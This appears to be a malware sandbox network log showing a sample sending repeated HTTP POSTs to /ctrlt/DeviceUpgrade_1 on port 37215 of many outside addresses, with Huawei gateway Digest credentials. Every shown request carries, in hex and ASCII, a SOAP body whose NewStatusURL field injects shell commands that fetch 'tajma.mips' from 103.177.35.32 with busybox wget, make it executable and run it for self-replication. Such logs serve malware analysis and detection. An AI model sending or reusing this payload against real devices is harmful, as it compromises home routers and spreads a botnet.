                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2926192.168.2.2346118197.165.87.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664300919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2927192.168.2.2343188197.116.250.6837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664401054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2928192.168.2.233299641.193.178.13037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664412022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2929192.168.2.2338742157.169.228.16137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664416075 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2930192.168.2.235034885.211.175.14837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664467096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2931192.168.2.2333282197.191.59.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664483070 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2932192.168.2.2351012157.105.35.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664552927 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2933192.168.2.2347558157.191.18.14237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664594889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2934192.168.2.2357550157.184.11.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664632082 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2935192.168.2.2345594197.255.157.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664633989 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
